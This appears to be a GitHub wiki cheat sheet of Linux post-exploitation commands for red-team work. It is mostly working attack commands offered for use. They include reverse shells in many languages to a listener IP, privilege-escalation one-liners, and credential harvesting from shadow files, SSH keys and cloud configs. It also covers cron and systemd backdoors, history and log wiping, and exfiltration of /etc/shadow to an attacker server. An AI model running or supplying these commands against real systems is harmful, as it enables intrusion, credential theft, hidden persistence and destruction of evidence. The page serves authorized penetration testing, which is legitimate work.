-
-
Notifications
You must be signed in to change notification settings - Fork 360
Linux Post Exploitation Command List
Rob Fuller edited this page Dec 13, 2025
·
6 revisions
Purpose: Comprehensive command reference for security assessments and red team operations on Linux/Unix/BSD systems.
Disclaimer: This document is intended for authorized security testing only. Unauthorized access to computer systems is illegal.
- Information Gathering
- Privilege Escalation
- Persistence & Access Maintenance
- Operational Security
- Lateral Movement
- Data Exfiltration
- Windows Interoperability
When you have limited file read access (LFI, directory traversal, etc.), target these files:
| File Path | Contents | Detection Risk |
|---|---|---|
/etc/resolv.conf |
DNS servers | Low - globally readable |
/etc/hosts |
Static hostname mappings | Low |
/etc/motd |
Message of the day | Low |
/etc/issue |
Distribution version | Low |
/etc/passwd |
User account list | Medium |
/etc/shadow |
Password hashes (requires root) | High |
/etc/group |
Group definitions | Low |
/proc/version |
Kernel version | Low |
/proc/cmdline |
Kernel boot parameters | Low |
/proc/self/environ |
Current process environment | Low |
/home/*/.bash_history |
Command history | Medium |
/home/*/.ssh/authorized_keys |
SSH public keys | Medium |
/root/.ssh/id_rsa |
Root's private SSH key | High |
/var/log/auth.log |
Authentication logs (Debian/Ubuntu) | Medium |
/var/log/secure |
Authentication logs (RHEL/CentOS) | Medium |
Note: Use %00 null byte for truncation in older PHP versions, and remember path traversal patterns like ../../../etc/passwd.
# Kernel and OS information
uname -a # Kernel version, architecture, hostname
cat /proc/version # Detailed kernel version
cat /etc/os-release # OS identification (systemd-based)
lsb_release -a # LSB distribution info
hostname -f # Fully qualified domain name
# Current user context
id # Current user, groups, and IDs
whoami # Current username
groups # Group memberships
# Who else is on the system
w # Currently logged in users, load average
who -a # Detailed user information
last -a # Login history
lastlog # Last login per user
users # Currently logged in users (simple)
# Process information
ps aux # All running processes
ps -ef # Alternative process listing
top -n 1 -b # Process snapshot
pstree -p # Process tree with PIDs
# System resources
free -h # Memory usage
df -h # Disk usage
cat /proc/cpuinfo # CPU details
cat /proc/meminfo # Detailed memory info
lscpu # CPU architecture info
lsblk # Block devices
# Hardware information
lspci # PCI buses and devices
lsusb # USB devices
lshw # Comprehensive hardware listing (may require root)
dmidecode # DMI/SMBIOS information (requires root)
# Boot and system logs
dmesg | less # Kernel ring buffer
journalctl -xe # systemd journal (recent entries)
cat /var/log/syslog # System log (Debian-based)
cat /var/log/messages # System log (RHEL-based)
# SELinux/AppArmor status
getenforce # SELinux status
sestatus # Detailed SELinux status
aa-status # AppArmor status# Common interpreters and tools
gcc -v # GCC compiler version
python --version # Python version
python3 --version
perl -v # Perl version
ruby -v # Ruby version
java -version # Java version
php -v # PHP version
node -v # Node.js version
mysql --version # MySQL client version
psql --version # PostgreSQL client version
# Locate specific binaries
which nmap nc netcat wget curl gcc python perl ruby
locate nmap | grep bin
locate nc | grep bin# Network interfaces and addresses
ip addr show # IP addresses (modern)
ip a # Short form
ifconfig -a # IP addresses (legacy)
hostname -I # All IP addresses
# Routing
ip route show # Routing table (modern)
ip r # Short form
route -n # Routing table (legacy)
netstat -r # Routing table (legacy)
# Network connections
ss -tunap # All TCP/UDP sockets (modern, fast)
netstat -tunap # All TCP/UDP sockets (legacy)
netstat -anop # With process info
lsof -nPi # Network connections via open files
lsof -nPi :80 # Specific port
# Firewall rules
iptables -L -n -v # IPv4 filter table
iptables -t nat -L -n -v # IPv4 NAT table
ip6tables -L -n -v # IPv6 filter table
iptables-save # All rules (complete dump)
nft list ruleset # nftables (modern)
# ARP table
ip neigh show # ARP cache (modern)
arp -a # ARP cache (legacy)
# DNS configuration
cat /etc/resolv.conf # DNS servers
cat /etc/hosts # Static hostname mappings
cat /etc/network/interfaces # Network configuration (Debian)
cat /etc/sysconfig/network-scripts/ifcfg-* # RHEL/CentOS
# Discover network information via /proc (stealthier)
cat /proc/net/tcp # TCP connections
cat /proc/net/udp # UDP connections
cat /proc/net/route # Routing table
cat /proc/net/arp # ARP table
cat /proc/net/fib_trie # Routing information# Local accounts
cat /etc/passwd # All user accounts
cat /etc/shadow # Password hashes (requires root)
cat /etc/group # Group definitions
cat /etc/gshadow # Secure group info (Linux)
# Get all accounts (includes LDAP, NIS, etc.)
getent passwd # All users from all sources
getent group # All groups from all sources
getent shadow # All shadow entries (requires root)
# Privileged users
grep -E ':0+:' /etc/passwd # Users with UID 0 (root privileges)
awk -F: '$3 == 0 {print $1}' /etc/passwd # Same as above
# Users with login shells
grep -v 'nologin\|false' /etc/passwd
cat /etc/passwd | grep -v 'nologin\|false' | cut -d: -f1
# Sudo configuration
cat /etc/sudoers # Sudo rules
cat /etc/sudoers.d/* # Additional sudo rules
sudo -l # Current user's sudo privileges
# Mail aliases
cat /etc/aliases # Mail aliases
getent aliases # From all sources
# Samba users (if applicable)
pdbedit -L -w # Samba users with hashes
pdbedit -L -v # Verbose Samba user info
# NIS/YP users (if applicable)
ypcat passwd # NIS password file
# Password policy
cat /etc/login.defs # Password aging, etc.
cat /etc/pam.d/* # PAM configuration
chage -l <username> # Password expiry info for user# User SSH keys
find /home -name "id_rsa" 2>/dev/null
find /home -name "id_dsa" 2>/dev/null
find /home -name "id_ecdsa" 2>/dev/null
find /home -name "id_ed25519" 2>/dev/null
cat /home/*/.ssh/id_* # All private keys
cat /home/*/.ssh/*.pub # All public keys
cat /home/*/.ssh/authorized_keys # Authorized keys
cat /home/*/.ssh/known_hosts # Known hosts
# System SSH keys
cat /etc/ssh/ssh_host_*_key # Host private keys (requires root)
# SSH agent (if running)
echo $SSH_AUTH_SOCK # SSH agent socket
ssh-add -l # List keys in agent# Kerberos tickets
ls -la /tmp/krb5cc_* # Ticket cache files
klist # List current tickets
cat /etc/krb5.conf # Kerberos configuration
cat /tmp/krb5.keytab # Keytab file
# PGP/GPG keys
find /home -name "secring.gpg" 2>/dev/null
find /home -name "*.asc" 2>/dev/null
cat /home/*/.gnupg/secring.gpg
# Password managers
find /home -name "*.kdbx" 2>/dev/null # KeePass databases
find /home -name ".password-store" -type d 2>/dev/null # pass
# Browser stored passwords
find /home -type d -name ".mozilla" 2>/dev/null
find /home -type d -name ".config/google-chrome" 2>/dev/null
ls -la /home/*/.mozilla/firefox/*/logins.json
ls -la /home/*/.config/google-chrome/Default/Login\ Data
# Shell history (may contain passwords)
cat /home/*/.bash_history
cat /home/*/.zsh_history
cat /home/*/.sh_history
cat /home/*/.mysql_history
cat /root/.bash_history
# Configuration files with credentials
grep -ri "password" /home/*/.config/ 2>/dev/null
grep -ri "password" /var/www/ 2>/dev/null
grep -ri "password" /opt/ 2>/dev/null
# vim history (may contain sensitive data)
cat /home/*/.viminfo
cat /root/.viminfo
# Docker credentials
cat /home/*/.docker/config.json
cat /root/.docker/config.json
# AWS credentials
cat /home/*/.aws/credentials
cat /home/*/.aws/config
# GCP credentials
cat /home/*/.config/gcloud/credentials.db# System configuration
cat /etc/issue # Pre-login message
cat /etc/issue.net # Network pre-login message
cat /etc/motd # Message of the day
cat /etc/hosts # Static host mappings
cat /etc/resolv.conf # DNS configuration
cat /etc/hostname # System hostname
cat /etc/timezone # Timezone
cat /etc/fstab # Filesystem mounts
cat /etc/exports # NFS exports
cat /etc/auto.master # Automount configuration
# Network configuration
cat /etc/network/interfaces # Debian network config
cat /etc/sysconfig/network-scripts/ifcfg-* # RHEL network config
cat /etc/netplan/*.yaml # Ubuntu 18.04+ netplan
# Service configurations
cat /etc/inetd.conf # inetd super-server
cat /etc/xinetd.d/* # xinetd services
systemctl list-unit-files # systemd services
chkconfig --list # SysV services (RHEL)
# Web servers
cat /etc/httpd/conf/httpd.conf # Apache (RHEL)
cat /etc/apache2/apache2.conf # Apache (Debian)
cat /etc/apache2/sites-enabled/* # Apache vhosts
cat /etc/nginx/nginx.conf # Nginx
cat /etc/nginx/sites-enabled/* # Nginx vhosts
cat /opt/lampp/etc/httpd.conf # XAMPP
cat /etc/lighttpd/lighttpd.conf # Lighttpd
# Database servers
cat /etc/mysql/my.cnf # MySQL/MariaDB
cat /var/lib/pgsql/data/postgresql.conf # PostgreSQL
cat /etc/mongod.conf # MongoDB
# Samba
cat /etc/samba/smb.conf # Samba configuration
# LDAP
cat /etc/ldap/ldap.conf # OpenLDAP client
cat /etc/openldap/ldap.conf # OpenLDAP client (RHEL)
# Mail
cat /etc/postfix/main.cf # Postfix
cat /etc/mail/sendmail.cf # Sendmail
# Logging
cat /etc/syslog.conf # Syslog (legacy)
cat /etc/rsyslog.conf # Rsyslog
cat /etc/rsyslog.d/* # Rsyslog additional configs
# Scheduled tasks
cat /etc/crontab # System crontab
cat /etc/cron.d/* # Additional cron jobs
cat /var/spool/cron/* # User crontabs (RHEL)
cat /var/spool/cron/crontabs/* # User crontabs (Debian)
ls -la /etc/cron.* # Cron directories
# Enumerate all user crontabs
for user in $(cut -f1 -d: /etc/passwd); do
echo "=== Crontab for $user ===";
crontab -u $user -l 2>/dev/null;
done
# Kernel and system tuning
cat /etc/sysctl.conf # Kernel parameters
cat /etc/security/limits.conf # Resource limits
# World-writable files in /etc (potential config overwrites)
find /etc -type f -perm -o+w 2>/dev/null
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null# Modern methods
cat /etc/os-release # Most distributions
lsb_release -a # LSB-compliant distributions
hostnamectl # systemd-based systems
# Distribution-specific files
cat /etc/issue # Generic (often customized)
cat /etc/*-release # Catch-all for release files
cat /etc/*_version # Version files
# Specific distributions
cat /etc/redhat-release # Red Hat / CentOS / Fedora
cat /etc/fedora-release # Fedora
cat /etc/debian_version # Debian
cat /etc/SUSE-release # SUSE
cat /etc/slackware-version # Slackware
cat /etc/gentoo-release # Gentoo
cat /etc/arch-release # Arch Linux (empty file)
cat /etc/alpine-release # Alpine Linux
# BSD systems
uname -a # Usually shows BSD variant
cat /etc/release # Solaris/OpenSolaris
arch # OpenBSD (shows "OpenBSD.amd64")
# Kernel version can hint at distribution
uname -r # Kernel release
cat /proc/version # Kernel build info# Red Hat / CentOS / Fedora (RPM-based)
rpm -qa # All installed packages
rpm -qa --last | head # Recently installed
yum list installed # Via yum
dnf list installed # Via dnf (newer)
# Debian / Ubuntu (DEB-based)
dpkg -l # All installed packages
dpkg -l | grep '^ii' # Installed packages only
dpkg --get-selections # Package selections
apt list --installed # Via apt
# Gentoo
ls -d /var/db/pkg/*/* # Installed packages
equery list '*' # If equery is available
# Arch Linux
pacman -Q # All installed packages
pacman -Qe # Explicitly installed packages
# FreeBSD / NetBSD
pkg info # All installed packages (pkg)
pkg_info # Legacy tool
# OpenBSD
pkg_info # All installed packages
# Solaris
pkginfo # All installed packages
# Alpine Linux
apk info # All installed packages
# Find kernel packages
rpm -qa | grep kernel # RPM-based
dpkg -l | grep linux-image # Debian-based# Debian / Ubuntu
cat /etc/apt/sources.list
cat /etc/apt/sources.list.d/*
# Red Hat / CentOS / Fedora
cat /etc/yum.conf
cat /etc/yum.repos.d/*
cat /etc/dnf/dnf.conf
cat /etc/dnf/repos.d/*
# Arch Linux
cat /etc/pacman.conf
cat /etc/pacman.d/mirrorlist
# Alpine
cat /etc/apk/repositories# List all directories
find / -type d 2>/dev/null
ls -la / # Root directory contents
ls -la /home # User home directories
ls -la /var # Variable data
ls -la /opt # Optional software
ls -la /usr/local # Locally installed software
ls -la /tmp # Temporary files
ls -la /dev/shm # Shared memory (often writable)
ls -la /var/tmp # Persistent temp files
ls -la /mnt # Mount points
ls -la /media # Removable media# SUID/SGID binaries (potential privilege escalation)
find / -perm -4000 -type f 2>/dev/null # SUID
find / -perm -2000 -type f 2>/dev/null # SGID
find / -perm -6000 -type f 2>/dev/null # SUID + SGID
find / -perm -u=s -type f 2>/dev/null # Alternative SUID syntax
# World-writable files and directories
find / -perm -2 -type f 2>/dev/null # World-writable files
find / -perm -2 -type d 2>/dev/null # World-writable directories
find / -perm -o+w -type f 2>/dev/null # Alternative syntax
# Files not owned by root in /etc
find /etc ! -uid 0 -type f 2>/dev/null
find /etc ! -gid 0 -type f 2>/dev/null
# Recently modified files
find / -mtime -1 -type f 2>/dev/null # Modified in last 24 hours
find / -mmin -60 -type f 2>/dev/null # Modified in last 60 minutes
find /home -mtime -7 -type f 2>/dev/null # Modified in last week
# Files containing passwords or secrets
grep -ri "password" /var/www 2>/dev/null
grep -ri "password=" /etc 2>/dev/null
grep -ri "pass=" /etc 2>/dev/null
grep -ri "pwd=" /etc 2>/dev/null
grep -ri "api_key" /var/www 2>/dev/null
grep -ri "secret" /var/www 2>/dev/null
# Configuration files
find / -name "*.conf" 2>/dev/null
find / -name "*.cfg" 2>/dev/null
find / -name "*.config" 2>/dev/null
find / -name "*.ini" 2>/dev/null
find / -name "*.xml" 2>/dev/null
find / -name "*.properties" 2>/dev/null
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
find / -name "*.sql" 2>/dev/null
# Script files
find / -name "*.sh" 2>/dev/null
find / -name "*.py" 2>/dev/null
find / -name "*.pl" 2>/dev/null
find / -name "*.rb" 2>/dev/null
# Archive files
locate tar | grep '\.tar$' 2>/dev/null
locate tgz | grep '\.tgz$' 2>/dev/null
locate zip | grep '\.zip$' 2>/dev/null
find / -name "*.tar" -o -name "*.tar.gz" -o -name "*.zip" 2>/dev/null
# History files
find /home -type f -iname '.*history' 2>/dev/null
find /root -type f -iname '.*history' 2>/dev/null
# SSH-related files
find / -name "authorized_keys" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "known_hosts" 2>/dev/null
find / -name "*.pem" 2>/dev/null
# Backup files (may contain old credentials)
find / -name "*.bak" 2>/dev/null
find / -name "*.backup" 2>/dev/null
find / -name "*.old" 2>/dev/null
find / -name "*~" 2>/dev/null
# Log files
find /var/log -type f 2>/dev/null
find /var/log -type f -perm -o+r 2>/dev/null # Readable by all
# Look for rhosts (legacy, but dangerous)
locate rhosts
find / -name ".rhosts" 2>/dev/null# Sudo misconfigurations
sudo -l # List sudo privileges
sudo -V # Sudo version (check for CVEs)
cat /etc/sudoers
cat /etc/sudoers.d/*
# Check for NOPASSWD entries
cat /etc/sudoers | grep NOPASSWD
# Cron jobs running as root
cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/root
# Writable systemd service files
find /etc/systemd/system -writable -type f 2>/dev/null
find /lib/systemd/system -writable -type f 2>/dev/null
# Check /root directory (if accessible)
ls -la /root
# Shadow file permissions
ls -l /etc/shadow # Should be 640 or 000
# Writable /etc/passwd (rare but devastating)
ls -l /etc/passwd
test -w /etc/passwd && echo "WRITABLE!"
# Check capabilities (can grant privileges)
getcap -r / 2>/dev/null
# Kernel exploits (check version against CVEs)
uname -a
uname -r
cat /proc/version
searchsploit "Linux Kernel"
# Docker socket access (root equivalent)
ls -l /var/run/docker.sock
groups | grep docker
# Interesting groups
id
groups
# Look for: docker, lxd, disk, video, sudo, wheel, adm
# NFS shares with no_root_squash
cat /etc/exports
showmount -e localhostFind and analyze SUID/SGID binaries for privilege escalation:
# Find all SUID binaries
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# Find all SGID binaries
find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null
# Known exploitable SUID binaries (not exhaustive)
# Check GTFOBins: https://gtfobins.github.io/
# Common targets:
# - nmap (older versions with --interactive)
# - vim/vi
# - find
# - less/more
# - python/perl/ruby with SUID
# - cp
# - mv
# - nano
# - awk
# - wget
# - curl
# Example: if find is SUID
find /home -exec /bin/sh -p \; -quit
# Example: if vim is SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# Example: if less is SUID
less /etc/profile
!/bin/sh
# Check for custom SUID binaries (more likely to be vulnerable)
find / -perm -4000 -type f 2>/dev/null | grep -v -E '/(bin|sbin)/'# World-writable directories (excluding /tmp, /var/tmp, /dev/shm)
find / -path /proc -prune -o -path /tmp -prune -o -path /var/tmp -prune -o -path /dev/shm -prune -o -type d -perm -0002 -exec ls -ld {} \; 2>/dev/null
# World-writable files
find / -path /proc -prune -o -type f -perm -0002 -exec ls -l {} \; 2>/dev/null
# Files in /etc writable by non-root
find /etc -writable -type f 2>/dev/null
# Writable scripts in PATH
echo $PATH | tr ':' '\n' | while read dir; do find $dir -writable -type f 2>/dev/null; done
# Writable library directories (LD_PRELOAD, LD_LIBRARY_PATH hijacking)
find /lib /lib64 /usr/lib /usr/lib64 -writable -type d 2>/dev/null
# Check for writable init scripts or systemd units
find /etc/init.d -writable -type f 2>/dev/null
find /etc/systemd/system -writable -type f 2>/dev/null
find /lib/systemd/system -writable -type f 2>/dev/nullLinux capabilities can grant specific privileges without full root:
# Find all files with capabilities set
getcap -r / 2>/dev/null
# Particularly dangerous capabilities:
# CAP_SETUID - can change UID (root escalation)
# CAP_DAC_OVERRIDE - bypass file read/write/execute checks
# CAP_DAC_READ_SEARCH - bypass file read checks and directory read/execute checks
# CAP_SYS_ADMIN - many privileges (mount, etc.)
# CAP_SYS_PTRACE - can trace any process
# CAP_SYS_MODULE - can load kernel modules
# CAP_NET_RAW - can use raw sockets
# CAP_NET_ADMIN - network configuration
# Example: If python has CAP_SETUID
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Example: If perl has CAP_SETUID
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
# Check current process capabilities
cat /proc/$$/status | grep Cap
capsh --decode=<hex_value>Note: Replace 10.0.0.1 with your listener IP and 1234 with your listener port.
# TCP reverse shell (if /dev/tcp is available)
bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
# Alternative
0<&196;exec 196<>/dev/tcp/10.0.0.1/1234; sh <&196 >&196 2>&196
# If /dev/tcp doesn't exist, use nc
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f# If nc supports -e flag
nc -e /bin/sh 10.0.0.1 1234
# If nc doesn't support -e
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
# OpenBSD netcat
nc 10.0.0.1 1234 -e /bin/sh
# Ncat (Nmap's version)
ncat 10.0.0.1 1234 -e /bin/sh
ncat --udp 10.0.0.1 1234 -e /bin/sh # UDP# Python 2
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
# Python 3
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
# Python with PTY (better shell)
python -c 'import socket,subprocess,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh")'perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
# Shorter version (may not work everywhere)
perl -MIO -e '$p=fork; exit,if($p); $c=new IO::Socket::INET(PeerAddr,"10.0.0.1:1234"); STDIN->fdopen($c,r); $~->fdopen($c,w); system$_ while<>;'php -r '$sock=fsockopen("10.0.0.1",1234); exec("/bin/sh -i <&3 >&3 2>&3");'
# Alternative
php -r '$s=fsockopen("10.0.0.1",1234); shell_exec("/bin/sh -i <&3 >&3 2>&3");'
# Using proc_open
php -r '$sock=fsockopen("10.0.0.1",1234); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);'ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Alternative
ruby -rsocket -e 'exit if fork; c=TCPSocket.new("10.0.0.1","1234"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read} end'# Reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
# Encrypted reverse shell (requires certificate)
socat openssl-connect:10.0.0.1:1234,verify=0 exec:/bin/bash,pty,stderr,setsid,sigint,sane# Two-step process
telnet 10.0.0.1 1234 | /bin/sh | telnet 10.0.0.1 1235
# Alternative using named pipes
rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 1234 0</tmp/p | /bin/sh 1>/tmp/pawk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/nullr = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Once you have a basic shell, upgrade it:
# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then set terminal type and size
export TERM=xterm
stty rows 50 cols 200 # Adjust to your terminal
# For full TTY (after Python PTY):
# 1. Ctrl+Z (background the shell)
# 2. On your machine: stty raw -echo; fg
# 3. In the shell: reset
# 4. Set TERM: export TERM=xterm
# Script command
script -qc /bin/bash /dev/null
# Expect
expect -c 'spawn /bin/bash; interact'
# Socat
socat file:`tty`,raw,echo=0 tcp-listen:1234# Local port forwarding (access remote service through SSH)
ssh -L 8080:127.0.0.1:80 user@remote-host
# Now localhost:8080 connects to remote-host:80
# Remote port forwarding (expose local service through remote SSH)
ssh -R 8080:127.0.0.1:80 user@remote-host
# Now remote-host:8080 connects to your localhost:80
# Dynamic port forwarding (SOCKS proxy)
ssh -D 8080 user@remote-host
# Configure browser/app to use SOCKS5 proxy at localhost:8080
# Reverse SSH tunnel (from compromised host to your machine)
ssh -NR 3333:localhost:22 user@your-host
# Now you can SSH back: ssh -p 3333 user@your-host
# Keep SSH alive
ssh -o ServerAliveInterval=60 user@host
# SSH through jump host
ssh -J jumphost@jump.com user@target.com# Generate key pair (if needed)
ssh-keygen -t ed25519 -f /tmp/mykey -N ""
# Add your public key to authorized_keys
echo "your-public-key-here" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
# Or for specific user
mkdir -p /home/username/.ssh
echo "your-public-key-here" >> /home/username/.ssh/authorized_keys
chmod 600 /home/username/.ssh/authorized_keys
chmod 700 /home/username/.ssh
chown -R username:username /home/username/.ssh# Allow root login (edit /etc/ssh/sshd_config)
PermitRootLogin yes
# Allow password authentication
PasswordAuthentication yes
# Restart SSH service
systemctl restart sshd # systemd
service ssh restart # SysV
/etc/init.d/sshd restart # Init script# User crontab (runs as that user)
crontab -e
# Example: Reverse shell every 15 minutes
*/15 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/1234 0>&1'
# System-wide crontab
echo "* * * * * root /path/to/backdoor.sh" >> /etc/crontab
# Cron directories (drop scripts here)
/etc/cron.d/
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
# Anacron (for systems not always on)
echo "@daily root /path/to/backdoor.sh" >> /etc/anacrontab# Create a service file: /etc/systemd/system/backdoor.service
[Unit]
Description=Backdoor Service
[Service]
Type=oneshot
ExecStart=/path/to/backdoor.sh
[Install]
WantedBy=multi-user.target
# Create a timer file: /etc/systemd/system/backdoor.timer
[Unit]
Description=Backdoor Timer
[Timer]
OnBootSec=5min
OnUnitActiveSec=15min
[Install]
WantedBy=timers.target
# Enable and start
systemctl enable backdoor.timer
systemctl start backdoor.timer# One-time execution
echo "/path/to/backdoor.sh" | at now + 5 minutes
echo "/path/to/backdoor.sh" | at 02:00
# List at jobs
atq
# View specific job
at -c <job_number>
# Remove job
atrm <job_number>- Minimize use of monitoring tools (ps, netstat, etc.) - prefer /proc instead
- Avoid suspicious command patterns
- Use legitimate tools when possible
- Match normal user behavior
- Clean up artifacts
- Avoid triggering IDS/EDR alerts
# Disable history for current session
export HISTFILE=/dev/null
unset HISTFILE
export HISTSIZE=0
export HISTFILESIZE=0
# Different shells
set +o history # Bash - disable
set -o history # Bash - re-enable
unset HISTFILE # Bash/ksh
unset HISTFILE HISTSIZE # Zsh
set history=0 # tcsh
# Space prefix trick (if configured)
<space>command # Won't be logged if HISTCONTROL contains ignorespace
export HISTCONTROL=ignorespace# Clear history in memory
history -c
# Clear history file
cat /dev/null > ~/.bash_history
> ~/.bash_history
# For all users (requires root)
find /home -name ".bash_history" -exec sh -c '> {}' \;
> /root/.bash_history
# Alternative: symlink to /dev/null (more obvious)
rm ~/.bash_history
ln -s /dev/null ~/.bash_history
# Clear specific entries
history -d <line_number>
# Clear recent entries
history -d -<number_of_entries># Remove specific patterns
sed -i '/pattern/d' ~/.bash_history
# Remove commands containing specific strings
grep -v "sensitive-command" ~/.bash_history > /tmp/history
cat /tmp/history > ~/.bash_history
rm /tmp/history
# Selective clearing
history | grep -v "secret" | cut -c 8- > /tmp/history
history -c
source /tmp/history
rm /tmp/history/var/log/auth.log # Debian/Ubuntu authentication
/var/log/secure # RHEL/CentOS authentication
/var/log/syslog # General system log (Debian)
/var/log/messages # General system log (RHEL)
/var/log/wtmp # Login records (binary)
/var/log/btmp # Failed login attempts (binary)
/var/log/lastlog # Last login per user (binary)
/var/log/audit/audit.log # Auditd logs
~/.bash_history # User command history
~/.mysql_history # MySQL command history
~/.ssh/known_hosts # SSH connections made# wtmp - successful logins
last -f /var/log/wtmp
last -a -f /var/log/wtmp
# btmp - failed logins
lastb -f /var/log/btmp
# utmp - currently logged in
who /var/run/utmp
w
# lastlog - last login per user
lastlogWarning: Log manipulation is easily detected by log monitoring systems and file integrity tools.
# View log size first
ls -lh /var/log/auth.log
# Remove entries containing your IP
sed -i '/10\.0\.0\.1/d' /var/log/auth.log
# Truncate log
> /var/log/auth.log
# Binary log manipulation
# utmpdump to human-readable
utmpdump /var/log/wtmp > /tmp/wtmp.txt
# Edit /tmp/wtmp.txt
# Convert back
utmpdump -r /tmp/wtmp.txt > /var/log/wtmp
# Clear specific entries from wtmp (dangerous)
# Better to avoid this - very likely to be detected# Use /proc instead of netstat/ss
cat /proc/net/tcp
cat /proc/net/udp
cat /proc/net/tcp6
cat /proc/net/udp6
# Use /proc instead of ps
ls -la /proc/*/exe
cat /proc/*/cmdline
cat /proc/*/status
# Read files without opening them (avoids access time update if noatime is not set)
dd if=/etc/passwd
# Avoid updating access times
touch -a -t YYMMDDHHMM /path/to/file # Set access time to specific value# Try obtained credentials on other hosts
ssh user@other-host
ssh user@10.0.0.0/24 # Try subnet
# Using SSH keys found on system
ssh -i /home/user/.ssh/id_rsa user@other-host
ssh -i /tmp/found_key user@other-host
# Check for SSH agent forwarding
echo $SSH_AUTH_SOCK
ssh-add -l# Ping sweep (if ICMP allowed)
for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" & done
# TCP scan using /dev/tcp (bash)
for port in {1..1024}; do timeout 1 bash -c "echo >/dev/tcp/192.168.1.10/$port" && echo "Port $port open"; done
# Using nc
nc -zv 192.168.1.10 1-1000
# If nmap is available
nmap -sn 192.168.1.0/24 # Host discovery
nmap -p- 192.168.1.10 # Full port scan# SSH dynamic port forwarding for pivoting
ssh -D 1080 user@compromised-host
# Configure proxychains to use socks5://127.0.0.1:1080
# Then: proxychains nmap -sT target
# SSH local port forwarding to access internal service
ssh -L 8080:internal-host:80 user@compromised-host
# Access via http://localhost:8080
# Using chisel (if you can upload it)
# On your machine:
./chisel server -p 8000 --reverse
# On target:
./chisel client your-ip:8000 R:1080:socks# Configuration management files
find / -name "*.yml" -o -name "*.yaml" 2>/dev/null | xargs grep -i "password"
find / -name "*.json" 2>/dev/null | xargs grep -i "password"
# Application configs
cat /var/www/html/config.php
cat /var/www/html/wp-config.php # WordPress
find /var/www -name "config*.php"
# Environment files
cat /var/www/html/.env
find / -name ".env" 2>/dev/null
# Database connection strings
grep -r "mysql://" /var/www 2>/dev/null
grep -r "postgresql://" /var/www 2>/dev/null
grep -r "mongodb://" /var/www 2>/dev/null# Base64 encode and copy/paste
cat file | base64
base64 -d > file # Decode on receiving end
# Using curl to upload
curl -X POST -F "file=@/etc/passwd" http://your-server/upload
# Using wget
wget --post-file=/etc/shadow http://your-server/upload
# DNS exfiltration (if only DNS is allowed out)
# Split file and send via DNS queries
xxd -p /etc/passwd | while read line; do dig $line.yourdomain.com; done
# ICMP exfiltration
# Requires root usually
# Using icmptunnel, iodine, or similar tools# Netcat transfer (if nc available on both sides)
# On receiving machine:
nc -l -p 1234 > file
# On target:
nc your-ip 1234 < file
# SSH/SCP
scp /path/to/file user@your-ip:/path/
rsync -avz /path/to/directory user@your-ip:/path/
# HTTP server (Python)
# On target:
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
# On your machine: wget http://target-ip:8080/file
# Compress before exfil
tar czf - /path/to/dir | nc your-ip 1234
# Receive: nc -l 1234 | tar xzf -# Using existing allowed protocols
# Email (if mail is configured)
tar czf /tmp/data.tar.gz /sensitive/data
uuencode /tmp/data.tar.gz data.tar.gz | mail -s "Report" your@email.com
# HTTPS (looks like normal traffic)
curl --data-binary @/etc/shadow https://your-server/api/upload
# Slow trickle to avoid detection
# Send 1KB every 5 minutes
split -b 1024 largefile chunk_
for f in chunk_*; do cat $f | nc your-ip 1234; sleep 300; done
# Steganography
# Hide data in images (if images are on system)
